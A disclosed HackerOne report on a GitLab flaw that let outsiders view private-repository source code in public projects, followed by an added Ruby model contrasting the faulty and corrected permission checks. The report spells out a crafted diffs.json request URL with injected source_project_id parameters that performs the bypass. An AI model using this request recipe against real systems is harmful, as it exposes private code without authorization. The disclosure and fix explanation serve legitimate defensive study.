
Source Code Disclosure of Private Repo in Public/Internal Project

HackerOne report #455673 by ngalog on 2018-12-05:

Summary: One of the very unique features of GitLab is that it allows you to adjust the permissions of each separate part of your project. Consider this setting: a public project with a private repo, like in this screenshot: publicWithPrivateRepo.PNG

The owner of a project could be secretly developing something in the repo part but want to keep the rest of the project public.

However, there is a way to bypass this protection and still allow a non-project member to view the source code of the repo.

Steps To Reproduce (Quick):

  • Log in and visit here to confirm you can't see the repo; the project ID is 9769102.
  • Visit one of the projects you own and open https://gitlab.com/{project_name_space}/merge_requests/new/diffs.json. If you see {"html":"\u003cdiv class=\"nothing-here-block\"\u003e\nThis merge request cannot be created.\n\u003c/div\u003e\n"} in the response, proceed; if not, create at least one file in that project first.
  • Then add this to the query part of the URL: ?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=9769102&merge_request%5Bsource_branch%5D=master&merge_request%5Btarget_project_id%5D=124124124&merge_request%5Btarget_branch%5D=master
  • Now you are looking at the source code of my private repo in project 9769102.

Slow way to reproduce:

  • Create a project with a config like this: publicWithPrivateRepo.PNG
  • Create some files inside.
  • Log in as another user and visit https://gitlab.com/{project_namespace_that_you_own}/merge_requests/new/diffs.json?utf8=%E2%9C%93&merge_request[source_project_id]={victim_project_id}&merge_request[source_branch]=master&merge_request[target_project_id]=1294819248&merge_request[target_branch]=master
  • Source code disclosure!

Impact

Source code disclosure for a private repo in a public project.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Edited by Dennis Appelt
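The root cause described in the report is an authorization check that stops at project visibility: the merge request diff endpoint accepted an arbitrary source_project_id and rendered its diff as long as the caller could see the project, ignoring that the repository feature itself was restricted to members. The following is an added example, not GitLab's code, that models this with a simplified permission layer (Project, User, the access-level names and the two authorize functions are all hypothetical) and shows the weak check beside the corrected one.

```ruby
# Added example (not GitLab's code): a simplified model of per-feature
# project permissions, showing why a merge-request diff endpoint must
# authorize against the *repository* feature of the source project,
# not only against the project's overall visibility.

# Constructed access levels for the repository feature. The names are
# hypothetical and only mirror the idea of GitLab's per-feature settings.
DISABLED = :disabled  # nobody can read the repository
PRIVATE  = :private   # members only
ENABLED  = :enabled   # everyone who can see the project

# Minimal stand-ins for a project and a user (hypothetical structures).
Project = Struct.new(:id, :public, :repository_access, :members)
User    = Struct.new(:name)

# Can the user see the project at all (its overview, issues, etc.)?
def can_read_project?(user, project)
  project.public || project.members.include?(user)
end

# Can the user read the repository (the source code) of the project?
# Repository access is a separate setting layered on top of visibility,
# so a public project may still have a members-only repository.
def can_read_repository?(user, project)
  return false unless can_read_project?(user, project)

  case project.repository_access
  when ENABLED then true
  when PRIVATE then project.members.include?(user)
  else false
  end
end

# Weak check: the diff endpoint only verifies that the caller can see
# both projects. A public project with a private repository passes,
# so its source code would be rendered in the diff.
def authorize_diff_vulnerable(user, source, target)
  can_read_project?(user, source) && can_read_project?(user, target)
end

# Corrected check: rendering a diff is reading source code, so require
# repository read access on the source project as well as the target.
def authorize_diff_fixed(user, source, target)
  can_read_repository?(user, source) && can_read_repository?(user, target)
end

# Constructed sample data reproducing the configuration in the report.
OWNER    = User.new("owner")
OUTSIDER = User.new("outsider")

# Public project whose repository is restricted to members.
VICTIM = Project.new(1, true, PRIVATE, [OWNER])
# The outsider's own project, supplied as the merge request target.
OUTSIDER_PROJECT = Project.new(2, true, ENABLED, [OUTSIDER])

if __FILE__ == $0
  puts "weak check allows outsider:      #{authorize_diff_vulnerable(OUTSIDER, VICTIM, OUTSIDER_PROJECT)}"
  puts "corrected check allows outsider: #{authorize_diff_fixed(OUTSIDER, VICTIM, OUTSIDER_PROJECT)}"
  puts "corrected check allows owner:    #{authorize_diff_fixed(OWNER, VICTIM, VICTIM)}"
end
```

The point the model makes is that any endpoint which takes a project identifier from the request and reads that project's code (diffs, compare views, raw files) needs the same per-feature repository check the repository pages themselves use; checking the target project, or only the project-level visibility of the source, is not enough.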